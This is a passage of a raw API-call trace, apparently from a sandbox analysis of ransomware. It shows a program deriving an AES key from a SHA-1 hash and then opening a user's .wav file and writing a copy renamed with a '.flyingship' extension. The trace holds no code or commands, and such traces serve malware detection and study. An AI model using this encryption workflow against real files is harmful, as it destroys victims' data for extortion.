[0187.277] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c00) returned 1 [0187.278] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.278] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.278] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0187.278] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0187.278] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0187.278] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.278] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.278] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.278] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0187.278] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0187.278] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0187.278] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0187.278] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.278] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.278] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.278] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0187.279] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.279] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.286] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0187.287] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.287] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0187.287] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0187.287] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.287] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.287] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0187.287] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0187.287] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0187.287] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0187.287] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.287] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.287] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.287] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0187.287] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0187.287] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0187.287] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.287] CryptCreateHash (in: hProv=0x9c0c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0187.287] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.287] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.288] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.288] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.288] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0187.288] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.288] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.288] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.288] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0187.288] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.288] CryptHashData (hHash=0x90ae18, pbData=0x8dec90, dwDataLen=0x19, dwFlags=0x1) returned 1 [0187.288] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.288] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.288] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.288] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.288] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0187.288] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0187.288] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0187.288] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.289] CryptDeriveKey (in: hProv=0x9c0c00, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90aed8) returned 1 [0187.289] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.289] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.289] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.289] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.289] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.289] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.289] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0187.289] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.289] CryptDestroyHash (hHash=0x90ae18) returned 1 [0187.289] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.289] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.289] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.289] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.289] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.290] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\rwwrmzhuo4\\x4yfdz60f6cktl.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0187.290] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.290] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0187.290] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0187.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0187.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0187.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0187.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0187.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0187.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0187.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0187.291] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0187.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0187.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0187.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0187.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0187.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0187.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0187.291] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.291] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0187.291] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0187.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0187.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0187.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0187.291] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0187.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0187.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0187.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0187.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0187.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0187.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0187.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0187.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0187.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0187.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0187.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0187.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0187.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0187.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0187.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0187.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0187.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0187.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0187.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0187.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0187.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0187.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0187.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0187.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xd0) returned 0x8c08b0 [0187.292] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0187.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8edfa0 [0187.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0187.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0187.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c08b0 | out: hHeap=0x8a0000) returned 1 [0187.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0187.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0187.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0187.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0187.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0187.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0187.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0187.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0187.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0187.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0187.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9058 [0187.293] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\rwwrmzhuo4")) returned 0x10 [0187.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9058 | out: hHeap=0x8a0000) returned 1 [0187.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0187.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0187.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0187.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0187.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0187.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0187.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0187.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0187.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0187.294] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\X4YFdz60f6cKTl.flyingship.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\rwwrmzhuo4\\x4yfdz60f6cktl.flyingship.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0187.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0187.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0187.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0187.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0187.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0187.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0187.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0187.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0187.295] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0187.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0187.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0187.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0187.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0187.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0187.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0187.295] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0187.295] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0187.295] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0187.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0187.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0187.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0187.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0187.295] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0187.296] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0187.296] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0187.296] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0187.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0187.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0187.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0187.296] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0187.296] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0187.296] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0187.296] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0187.296] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0187.296] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x2435, lpOverlapped=0x0) returned 1 [0187.299] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0187.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: 